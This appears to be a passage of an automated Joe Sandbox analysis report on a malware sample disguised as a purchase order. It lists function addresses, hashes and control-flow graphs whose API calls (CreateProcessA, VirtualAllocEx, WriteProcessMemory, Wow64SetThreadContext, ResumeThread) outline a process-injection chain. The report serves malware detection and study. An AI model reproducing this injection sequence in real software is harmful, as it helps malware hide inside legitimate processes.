6d15b8e 20738->20756 20771 6d15b20 20738->20771 20743 6d15b4a 20742->20743 20744 6d15b6e 20743->20744 20785 6d16538 20743->20785 20789 6d163a8 20743->20789 20794 6d160f9 20743->20794 20799 6d160c9 20743->20799 20806 6d165b7 20743->20806 20810 6d16307 20743->20810 20815 6d166c4 20743->20815 20819 6d16584 20743->20819 20824 6d15fed 20743->20824 20829 6d16888 20743->20829 20833 6d15f38 20743->20833 20744->20738 20757 6d15b1c 20756->20757 20759 6d15b91 20756->20759 20758 6d15b6e 20757->20758 20760 6d16584 2 API calls 20757->20760 20761 6d166c4 2 API calls 20757->20761 20762 6d16307 2 API calls 20757->20762 20763 6d165b7 2 API calls 20757->20763 20764 6d160c9 4 API calls 20757->20764 20765 6d160f9 2 API calls 20757->20765 20766 6d163a8 2 API calls 20757->20766 20767 6d16538 2 API calls 20757->20767 20768 6d15f38 2 API calls 20757->20768 20769 6d16888 2 API calls 20757->20769 20770 6d15fed 2 API calls 20757->20770 20758->20738 20759->20738 20760->20758 20761->20758 20762->20758 20763->20758 20764->20758 20765->20758 20766->20758 20767->20758 20768->20758 20769->20758 20770->20758 20772 6d15b4a 20771->20772 20773 6d15b6e 20772->20773 20774 6d16584 2 API calls 20772->20774 20775 6d166c4 2 API calls 20772->20775 20776 6d16307 2 API calls 20772->20776 20777 6d165b7 2 API calls 20772->20777 20778 6d160c9 4 API calls 20772->20778 20779 6d160f9 2 API calls 20772->20779 20780 6d163a8 2 API calls 20772->20780 20781 6d16538 2 API calls 20772->20781 20782 6d15f38 2 API calls 20772->20782 20783 6d16888 2 API calls 20772->20783 20784 6d15fed 2 API calls 20772->20784 20773->20738 20774->20773 20775->20773 20776->20773 20777->20773 20778->20773 20779->20773 20780->20773 20781->20773 20782->20773 20783->20773 20784->20773 20786 6d16565 20785->20786 20837 6d14b11 20785->20837 20841 6d14b18 20785->20841 20845 6d14890 20789->20845 20849 6d14888 20789->20849 20790 6d1634d 20790->20789 20791 6d16452 20790->20791 20795 6d16122 20794->20795 20853 6d143a0 20795->20853 20857 6d143a8 20795->20857 20796 6d15fa4 20796->20744 20800 6d160e3 20799->20800 20861 6d14960 20800->20861 20865 6d14968 20800->20865 20801 6d16261 20869 6d14a20 20801->20869 20873 6d14a28 20801->20873 20808 6d14890 Wow64SetThreadContext 20806->20808 20809 6d14888 Wow64SetThreadContext 20806->20809 20807 6d1653c 20807->20744 20808->20807 20809->20807 20811 6d16310 20810->20811 20813 6d14a20 WriteProcessMemory 20811->20813 20814 6d14a28 WriteProcessMemory 20811->20814 20812 6d1603a 20813->20812 20814->20812 20817 6d14a20 WriteProcessMemory 20815->20817 20818 6d14a28 WriteProcessMemory 20815->20818 20816 6d166fb 20817->20816 20818->20816 20820 6d16122 20819->20820 20821 6d15fa4 20819->20821 20822 6d143a0 ResumeThread 20820->20822 20823 6d143a8 ResumeThread 20820->20823 20821->20744 20822->20821 20823->20821 20825 6d16543 20824->20825 20827 6d14b11 ReadProcessMemory 20825->20827 20828 6d14b18 ReadProcessMemory 20825->20828 20826 6d16565 20827->20826 20828->20826 20830 6d167c1 20829->20830 20831 6d14a20 WriteProcessMemory 20830->20831 20832 6d14a28 WriteProcessMemory 20830->20832 20831->20830 20832->20830 20877 6d14cb0 20833->20877 20881 6d14ca4 20833->20881 20838 6d14b18 ReadProcessMemory 20837->20838 20840 6d14ba7 20838->20840 20840->20786 20842 6d14b63 ReadProcessMemory 20841->20842 20844 6d14ba7 20842->20844 20844->20786 20846 6d148d5 Wow64SetThreadContext 20845->20846 20848 6d1491d 20846->20848 20848->20790 20850 6d1488c Wow64SetThreadContext 20849->20850 20852 6d1491d 20850->20852 20852->20790 20854 6d143a8 ResumeThread 20853->20854 20856 6d14419 20854->20856 20856->20796 20858 6d143e8 ResumeThread 20857->20858 20860 6d14419 20858->20860 20860->20796 20862 6d14968 VirtualAllocEx 20861->20862 20864 6d149e5 20862->20864 20864->20801 20866 6d149a8 VirtualAllocEx 20865->20866 20868 6d149e5 20866->20868 20868->20801 20870 6d14a28 WriteProcessMemory 20869->20870 20872 6d14ac7 20870->20872 20872->20801 20874 6d14a70 WriteProcessMemory 20873->20874 20876 6d14ac7 20874->20876 20876->20801 20878 6d14d39 CreateProcessA 20877->20878 20880 6d14efb 20878->20880 20882 6d14cb0 CreateProcessA 20881->20882 20884 6d14efb 20882->20884

                                  Executed Functions

                                  Function 00E1D780 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 00E1D7FE
                                  • GetCurrentThread.KERNEL32 ref: 00E1D83B
                                  • GetCurrentProcess.KERNEL32 ref: 00E1D878
                                  • GetCurrentThreadId.KERNEL32 ref: 00E1D8D1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2084939188.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0
                                  • Opcode ID: 29555305a678b98900ab1508c19c913dbefa368b803b5c2cf17a79bee762931e
                                  • Instruction ID: 36a88fd954b663b80647e96891b901c6ec8cb67eccda6db6a272b8fc8b7e0547
                                  • Opcode Fuzzy Hash: 29555305a678b98900ab1508c19c913dbefa368b803b5c2cf17a79bee762931e
                                  • Instruction Fuzzy Hash: 685168B09003499FDB58DFA9D948BEEBBF1EF88314F208459E009B7350DB74A944CB61
                                  Function 06D14CA4 Relevance: 1.7, APIs: 1, Instructions: 248processCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 32 6d14ca4-6d14d45 35 6d14d47-6d14d51 32->35 36 6d14d7e-6d14d9e 32->36 35->36 37 6d14d53-6d14d55 35->37 43 6d14da0-6d14daa 36->43 44 6d14dd7-6d14e06 36->44 38 6d14d57-6d14d61 37->38 39 6d14d78-6d14d7b 37->39 41 6d14d63 38->41 42 6d14d65-6d14d74 38->42 39->36 41->42 42->42 45 6d14d76 42->45 43->44 46 6d14dac-6d14dae 43->46 50 6d14e08-6d14e12 44->50 51 6d14e3f-6d14ef9 CreateProcessA 44->51 45->39 48 6d14dd1-6d14dd4 46->48 49 6d14db0-6d14dba 46->49 48->44 52 6d14dbc 49->52 53 6d14dbe-6d14dcd 49->53 50->51 54 6d14e14-6d14e16 50->54 64 6d14f02-6d14f88 51->64 65 6d14efb-6d14f01 51->65 52->53 53->53 55 6d14dcf 53->55 56 6d14e39-6d14e3c 54->56 57 6d14e18-6d14e22 54->57 55->48 56->51 59 6d14e24 57->59 60 6d14e26-6d14e35 57->60 59->60 60->60 61 6d14e37 60->61 61->56 75 6d14f98-6d14f9c 64->75 76 6d14f8a-6d14f8e 64->76 65->64 78 6d14fac-6d14fb0 75->78 79 6d14f9e-6d14fa2 75->79 76->75 77 6d14f90 76->77 77->75 81 6d14fc0-6d14fc4 78->81 82 6d14fb2-6d14fb6 78->82 79->78 80 6d14fa4 79->80 80->78 84 6d14fd6-6d14fdd 81->84 85 6d14fc6-6d14fcc 81->85 82->81 83 6d14fb8 82->83 83->81 86 6d14ff4 84->86 87 6d14fdf-6d14fee 84->87 85->84 89 6d14ff5 86->89 87->86 89->89
                                  APIs
                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06D14EE6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2088360959.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6d10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: 58e96229da6607bd69782306d8c4f99a79cb53dda79d8662c031f607f1386287
                                  • Instruction ID: bc3567f9eff5ee621267ef4237411c738477beb086a3879055dc7783795e1565
                                  • Opcode Fuzzy Hash: 58e96229da6607bd69782306d8c4f99a79cb53dda79d8662c031f607f1386287
                                  • Instruction Fuzzy Hash: 7AA14C71D00259DFEF60DFA8D841BDDBBF2AF48310F148569E818AB280DBB49985CF91
                                  Function 06D14CB0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 90 6d14cb0-6d14d45 92 6d14d47-6d14d51 90->92 93 6d14d7e-6d14d9e 90->93 92->93 94 6d14d53-6d14d55 92->94 100 6d14da0-6d14daa 93->100 101 6d14dd7-6d14e06 93->101 95 6d14d57-6d14d61 94->95 96 6d14d78-6d14d7b 94->96 98 6d14d63 95->98 99 6d14d65-6d14d74 95->99 96->93 98->99 99->99 102 6d14d76 99->102 100->101 103 6d14dac-6d14dae 100->103 107 6d14e08-6d14e12 101->107 108 6d14e3f-6d14ef9 CreateProcessA 101->108 102->96 105 6d14dd1-6d14dd4 103->105 106 6d14db0-6d14dba 103->106 105->101 109 6d14dbc 106->109 110 6d14dbe-6d14dcd 106->110 107->108 111 6d14e14-6d14e16 107->111 121 6d14f02-6d14f88 108->121 122 6d14efb-6d14f01 108->122 109->110 110->110 112 6d14dcf 110->112 113 6d14e39-6d14e3c 111->113 114 6d14e18-6d14e22 111->114 112->105 113->108 116 6d14e24 114->116 117 6d14e26-6d14e35 114->117 116->117 117->117 118 6d14e37 117->118 118->113 132 6d14f98-6d14f9c 121->132 133 6d14f8a-6d14f8e 121->133 122->121 135 6d14fac-6d14fb0 132->135 136 6d14f9e-6d14fa2 132->136 133->132 134 6d14f90 133->134 134->132 138 6d14fc0-6d14fc4 135->138 139 6d14fb2-6d14fb6 135->139 136->135 137 6d14fa4 136->137 137->135 141 6d14fd6-6d14fdd 138->141 142 6d14fc6-6d14fcc 138->142 139->138 140 6d14fb8 139->140 140->138 143 6d14ff4 141->143 144 6d14fdf-6d14fee 141->144 142->141 146 6d14ff5 143->146 144->143 146->146
                                  APIs
                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06D14EE6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2088360959.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6d10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: fc7c196d80023a69afd84646348c8faf055cd958e13b37f022b8670ba0bc45b9
                                  • Instruction ID: 27c7052544e9e35c5f2a70b3345ecdb06c838c5eff383f07e3e2635769365fdb
                                  • Opcode Fuzzy Hash: fc7c196d80023a69afd84646348c8faf055cd958e13b37f022b8670ba0bc45b9
                                  • Instruction Fuzzy Hash: DC913A71D00259DFEF60DFA8D841BDDBBF2AF48310F148569E818AB280DBB49985CF91
                                  Function 00E15A64 Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 147 e15a64-e15af4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2084939188.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9bc1a31e3ed45f874904ad9dcd0e4a9ea77b42c482e0757e8a93aaad8534bb52
                                  • Instruction ID: 0a2f0d9bd3741a6e24d440475e201ed507cdc5c1aa5d11d236bebdb7344a63ba
                                  • Opcode Fuzzy Hash: 9bc1a31e3ed45f874904ad9dcd0e4a9ea77b42c482e0757e8a93aaad8534bb52
                                  • Instruction Fuzzy Hash: 9E31AB72804A48CFDF11CFA8C8457EDBBF1AF86318F54958AC0256B251C775A986CF51
                                  Function 00E144B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 150 e144b0-e159b9 CreateActCtxA 154 e159c2-e15a1c 150->154 155 e159bb-e159c1 150->155 162 e15a2b-e15a2f 154->162 163 e15a1e-e15a21 154->163 155->154 164 e15a31-e15a3d 162->164 165 e15a40 162->165 163->162 164->165 167 e15a41 165->167 167->167
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 00E159A9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2084939188.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: ddb98214ec9aded8525e13e20d8c6eb977d9aee5ea946b68ac58574d0331b8d7
                                  • Instruction ID: 2aa123580da5a43c19f03d6560ce3a1b387574302c51c92178880b4e4eee6964
                                  • Opcode Fuzzy Hash: ddb98214ec9aded8525e13e20d8c6eb977d9aee5ea946b68ac58574d0331b8d7
                                  • Instruction Fuzzy Hash: 6A41C0B1D00719CBEB24DFAAC9447DDBBB6BF88704F20816AD408BB251DB756945CF90
                                  Function 00E158F5 Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 168 e158f5-e1596c 169 e1596f-e159b9 CreateActCtxA 168->169 171 e159c2-e15a1c 169->171 172 e159bb-e159c1 169->172 179 e15a2b-e15a2f 171->179 180 e15a1e-e15a21 171->180 172->171 181 e15a31-e15a3d 179->181 182 e15a40 179->182 180->179 181->182 184 e15a41 182->184 184->184
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 00E159A9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2084939188.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: cf1d7c142a487dbb270edf48b25be07f157f3973d05858fce4f48a9d93cdc013
                                  • Instruction ID: b772ca58fefdc0858af902ef20586aab53e2bccfb47757451fc08a201057257b
                                  • Opcode Fuzzy Hash: cf1d7c142a487dbb270edf48b25be07f157f3973d05858fce4f48a9d93cdc013
                                  • Instruction Fuzzy Hash: 0941B0B1C00719CBDB24DFAAC9847DDBBF6BF88704F20816AD418AB251DB756945CF50
                                  Function 06D14A20 Relevance: 1.6, APIs: 1, Instructions: 74injectionCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 185 6d14a20-6d14a76 188 6d14a86-6d14ac5 WriteProcessMemory 185->188 189 6d14a78-6d14a84 185->189 191 6d14ac7-6d14acd 188->191 192 6d14ace-6d14afe 188->192 189->188 191->192
                                  APIs
                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06D14AB8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2088360959.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6d10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: bd774f79a4402f40b89597e67b50b82ca419a002d254719af90887dc5612b5eb
                                  • Instruction ID: 7170d584122b5261b20824a281c659725a197df3abd554575842ac7be153150d
                                  • Opcode Fuzzy Hash: bd774f79a4402f40b89597e67b50b82ca419a002d254719af90887dc5612b5eb
                                  • Instruction Fuzzy Hash: 84215771900349DFDB10DFA9D881BDEBBF5FF48310F10842AE958A7240C7789550CBA4
                                  Function 06D14A28 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 196 6d14a28-6d14a76 198 6d14a86-6d14ac5 WriteProcessMemory 196->198 199 6d14a78-6d14a84 196->199 201 6d14ac7-6d14acd 198->201 202 6d14ace-6d14afe 198->202 199->198 201->202
                                  APIs
                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06D14AB8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2088360959.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6d10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: MemoryProcessWrite
                                  • String ID:
                                  • API String ID: 3559483778-0
                                  • Opcode ID: 0eda8689d4a406516d163ca37d8545ec8057925ae5121222480134e0bcc51cc1
                                  • Instruction ID: c86375fe9bfabf77b3ebe4884cda2c8355c533ace8452d811447c6d17b3563ea
                                  • Opcode Fuzzy Hash: 0eda8689d4a406516d163ca37d8545ec8057925ae5121222480134e0bcc51cc1
                                  • Instruction Fuzzy Hash: 222124719003499FDB50CFAAD981BDEBBF5FF48324F10842AE918A7240D7B89950CBA4
                                  Function 06D14B11 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 218 6d14b11-6d14ba5 ReadProcessMemory 222 6d14ba7-6d14bad 218->222 223 6d14bae-6d14bde 218->223 222->223
                                  APIs
                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06D14B98
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2088360959.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6d10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  • Opcode ID: cf6677fa6f79668117bcc469810aeec79909072535a79f9d49abaadf5fd2b985
                                  • Instruction ID: 35f89778222832b374e4ba62b9e46f4ead588e38d513a92dd15b29348c83d85d
                                  • Opcode Fuzzy Hash: cf6677fa6f79668117bcc469810aeec79909072535a79f9d49abaadf5fd2b985
                                  • Instruction Fuzzy Hash: 4E2125B18003499FDB10DFAAC881BEEFBF5FF48320F10842AE558A7240C7789511DBA5
                                  Function 06D14888 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 206 6d14888-6d1488a 207 6d14890-6d148db 206->207 208 6d1488c-6d1488f 206->208 210 6d148eb-6d1491b Wow64SetThreadContext 207->210 211 6d148dd-6d148e9 207->211 208->207 213 6d14924-6d14954 210->213 214 6d1491d-6d14923 210->214 211->210 214->213
                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D1490E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2088360959.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6d10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: e309ef34a67e5ee6cfad5136336225cfd604c52dd32d19c72ac45cd47a27175f
                                  • Instruction ID: d1eb56e4d30a39e0ccf02e21ed613e436ee7b99bde8e45df03ac08117b284166
                                  • Opcode Fuzzy Hash: e309ef34a67e5ee6cfad5136336225cfd604c52dd32d19c72ac45cd47a27175f
                                  • Instruction Fuzzy Hash: 82217AB1D003499FDB10CFAAD8817EEBBF4AF88324F148429D458A7240C7B89545CBA1
                                  Function 06D14B18 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 237 6d14b18-6d14ba5 ReadProcessMemory 240 6d14ba7-6d14bad 237->240 241 6d14bae-6d14bde 237->241 240->241
                                  APIs
                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06D14B98
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2088360959.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6d10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: MemoryProcessRead
                                  • String ID:
                                  • API String ID: 1726664587-0
                                  • Opcode ID: 508d650b6baceae27c14f53604dbe006117f6afba0a7ad99248f7f9a60d2864a
                                  • Instruction ID: d0e5a9f6e15e871edf7f1247af37a0c88e6acc9242802df010ff627383d48a0c
                                  • Opcode Fuzzy Hash: 508d650b6baceae27c14f53604dbe006117f6afba0a7ad99248f7f9a60d2864a
                                  • Instruction Fuzzy Hash: 402125B18003499FDF10DFAAC981BEEBBF5FF48320F10842AE519A7240C7789910CBA5
                                  Function 06D14890 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 227 6d14890-6d148db 229 6d148eb-6d1491b Wow64SetThreadContext 227->229 230 6d148dd-6d148e9 227->230 232 6d14924-6d14954 229->232 233 6d1491d-6d14923 229->233 230->229 233->232
                                  APIs
                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D1490E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2088360959.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6d10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: ContextThreadWow64
                                  • String ID:
                                  • API String ID: 983334009-0
                                  • Opcode ID: 60f241520b031cfb9fcb004fbf2a3cfef1c385ca79b9dee2d4640b52dbfad081
                                  • Instruction ID: 5b6a385e39a8c3db3f45961b81d29ae8cb91ba46b627088bec54c45bcf5cfae5
                                  • Opcode Fuzzy Hash: 60f241520b031cfb9fcb004fbf2a3cfef1c385ca79b9dee2d4640b52dbfad081
                                  • Instruction Fuzzy Hash: 5D213871D003099FDB10DFAAC4857EEBBF4EF88324F14842AD559A7240CBB89944CFA5
                                  Function 00E1D9C8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 245 e1d9c8-e1da5c DuplicateHandle 246 e1da65-e1da82 245->246 247 e1da5e-e1da64 245->247 247->246
                                  APIs
                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E1DA4F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2084939188.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DuplicateHandle
                                  • String ID:
                                  • API String ID: 3793708945-0
                                  • Opcode ID: 8a906a5d186816f130ec626f1e699768584620731f45e7cf43ad013eb805777d
                                  • Instruction ID: e2f56778e8b8722361f8da9a00b4d8c9157692ae201fa10874ef531269534646
                                  • Opcode Fuzzy Hash: 8a906a5d186816f130ec626f1e699768584620731f45e7cf43ad013eb805777d
                                  • Instruction Fuzzy Hash: CB21C4B5904249DFDB10CF9AD984ADEBBF4FF48320F14841AE958A3350D378A954CF65
                                  Function 06D14960 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 250 6d14960-6d149e3 VirtualAllocEx 254 6d149e5-6d149eb 250->254 255 6d149ec-6d14a11 250->255 254->255
                                  APIs
                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06D149D6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2088360959.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6d10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: db2481fb9a10985a2fbffc1842643dc42fe67fd426abfd193c2fc7d11a6b850a
                                  • Instruction ID: 94195cc351b1a81ae99e2d29b8f828221dba6304dce3d40555ab2465d8cc98ff
                                  • Opcode Fuzzy Hash: db2481fb9a10985a2fbffc1842643dc42fe67fd426abfd193c2fc7d11a6b850a
                                  • Instruction Fuzzy Hash: CD1156728003499FDB20DFAAD841BDFBFF5AF88320F208419E559AB250C7759550CBA1
                                  Function 00E1B208 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00E1B7B9,00000800,00000000,00000000), ref: 00E1B9CA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2084939188.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: cc5db97726f0187a8957f06e08416c4047900e7b6026ddeed4d8c621f63206f7
                                  • Instruction ID: c0373f9337698c288f52c1e0311dd211391ab755803ff7748b2fb168f6f1f5a2
                                  • Opcode Fuzzy Hash: cc5db97726f0187a8957f06e08416c4047900e7b6026ddeed4d8c621f63206f7
                                  • Instruction Fuzzy Hash: 571114B69003499FDB10CF9AC484BDEFBF4EB88314F10842AE519B7200C3B9A945CFA5
                                  Function 06D14968 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06D149D6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2088360959.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6d10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: c39763c25eb0fc1c07fab2a36d61b839c36ff50918fb230509eccfed0251f43d
                                  • Instruction ID: 41ac96a919230f7aac860add7e04f1692526f6367b33ed501e312eb7109b6d45
                                  • Opcode Fuzzy Hash: c39763c25eb0fc1c07fab2a36d61b839c36ff50918fb230509eccfed0251f43d
                                  • Instruction Fuzzy Hash: 521156728002499FDB10DFAAC845BDFBBF5AF88320F20841AE519A7250C775A910CBA0
                                  Function 00E1B95F Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00E1B7B9,00000800,00000000,00000000), ref: 00E1B9CA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2084939188.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 0b41a348b36edd999cab799deb1c07dc887736d84f56f47a7e9d5d12bf35b47f
                                  • Instruction ID: 2d2c99d7e5a32e2ccab9d239c97f43d09da87aebf1567ed5ccf6d84226f02ee8
                                  • Opcode Fuzzy Hash: 0b41a348b36edd999cab799deb1c07dc887736d84f56f47a7e9d5d12bf35b47f
                                  • Instruction Fuzzy Hash: 7711F3B68002498FDB10CF9AD484ADEFBF4EB88724F10842AD559B7200C3B9A945CFA5
                                  Function 06D143A0 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2088360959.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6d10000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: dd39d01b8adcf9c687e7cc1ab6cf7e2ad3dc6606204e2ce7e7ab8fa7055b5a96
                                  • Instruction ID: 026021c442f14ef1f431a966804bf2757ead61221fb755b33c1aa26959509641
                                  • Opcode Fuzzy Hash: dd39d01b8adcf9c687e7cc1ab6cf7e2ad3dc6606204e2ce7e7ab8fa7055b5a96
                                  • Instruction Fuzzy Hash: C51176B1900349CFDB20DFAAD844BDFFBF4AF88324F208419D119A7240CBB9A400CBA4
                                  Function 06D18A50 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
